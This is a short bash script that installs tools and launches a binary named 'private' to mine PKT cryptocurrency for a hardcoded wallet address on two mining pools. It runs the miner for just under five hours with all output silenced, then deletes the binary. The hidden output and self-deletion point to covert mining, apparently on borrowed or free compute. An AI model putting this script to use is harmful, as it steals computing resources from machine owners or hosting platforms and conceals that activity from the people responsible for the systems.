#!/bin/bash
apt update && apt -y install wget git curl sudo
chmod +x private
timeout 295m ./private ann -p pkt1qj7fy47ll0tkfrknpm7u3l5fvkc6jzhkc9pa950 http://pool.pkt.world/ http://pool.pktpool.io/ >/dev/null 2>&1 
rm -rf private
